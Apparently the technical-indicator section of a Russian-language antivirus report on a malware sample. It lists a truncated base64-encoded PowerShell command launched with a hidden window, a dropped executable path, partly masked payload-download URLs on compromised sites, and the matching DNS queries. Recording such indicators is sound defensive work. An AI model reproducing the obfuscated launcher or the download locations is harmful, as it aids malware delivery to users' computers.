Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAGUAaABuAHYANQBsAD0AKAAoACcAWQAnACsAJwBnAG4AJwApACsAJwB2AHAAJwArACcAaQBvACcAKQA7ACYAKAAnAG4AJwArACcAZQB3AC0AaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAdQBzAEUAUgBwAFIAbwBmAGkAbABFAFwARQBpADEAcwBKAD...
- %HOMEPATH%\ei1sj5c\z2_iglc\eq8gukev.exe
- %HOMEPATH%\ei1sj5c\z2_iglc\eq8gukev.exe
- 'fa##e.fr':80
- http://co##ub.de/cgi-bin/qgi3ncv70163850/
- http://ar#####oposlovanje.com/wp-snapshots/attach/dhbi/
- http://www.ar#####oposlovanje.com/wp-snapshots/attach/dhbi/
- http://dr###-estate.ch/wp-includes/attach/jZN/
- http://eg###tair.co.nz/css/file/yUULClon/
- http://fa#####aarcobaleno.ch/wp-snapshots/PNXFHEqzTK/
- http://es####malibe.com.br/erros/file/tKteajFWorT/
- DNS ASK co##ub.de
- DNS ASK ar#####oposlovanje.com
- DNS ASK dr###-estate.ch
- DNS ASK eg###tair.co.nz
- DNS ASK fa#####aarcobaleno.ch
- DNS ASK es####malibe.com.br
- DNS ASK fa##e.fr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAGUAaABuAHYANQBsAD0AKAAoACcAWQAnACsAJwBnAG4AJwApACsAJwB2AHAAJwArACcAaQBvACcAKQA7ACYAKAAnAG4AJwArACcAZQB3AC0AaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAdQBzAEUAUgBwAFIAbwBmAGkAbABFAFwARQBpADEAcwBKAD...' (со скрытым окном)